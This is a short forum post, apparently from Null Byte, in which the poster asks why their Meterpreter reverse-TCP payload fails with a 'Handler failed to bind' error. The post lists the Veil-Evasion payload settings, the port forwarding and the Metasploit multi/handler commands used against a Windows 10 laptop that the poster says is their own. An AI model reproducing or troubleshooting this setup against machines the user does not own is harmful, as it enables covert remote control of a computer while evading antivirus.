Hello community!
I have searched for a solution in and out of Null Byte but it didn't help me yet... I know that there are 2 other topics on this problem but none of them were helpfull enough I believe...
I am trying to exploit a laptop with windows 10 in WAN. I have 2 laptops by my side, each with it's own ISP (one of them is a mobile ISP).
In order to do so, I created an .exe file using veil-evasion with the following :
payload = windows/meterpreter/reverse_tcp
lhost= - public IP -
lport= 4444
I portforwarded port 4444 in my router for TCP and UDP protocols to my local ip (192.168.1.3). Then , I opened a multi handler on the attacker:
use exploit/multi/handler
lhost = - public IP-
lport = 4444
Afterwards, I ran the encrypted exe file in the victim PC and ran "exploit" in the attacker. This eventually gave me a "Handler failed to bind" error while meterpreter connection won't establish.
I have looked everywhere but I still can't understand what causes this. Perhaps these exploits won't work on windows 10? Thank you in advance!
Comments
No Comments Exist
Be the first, drop a comment!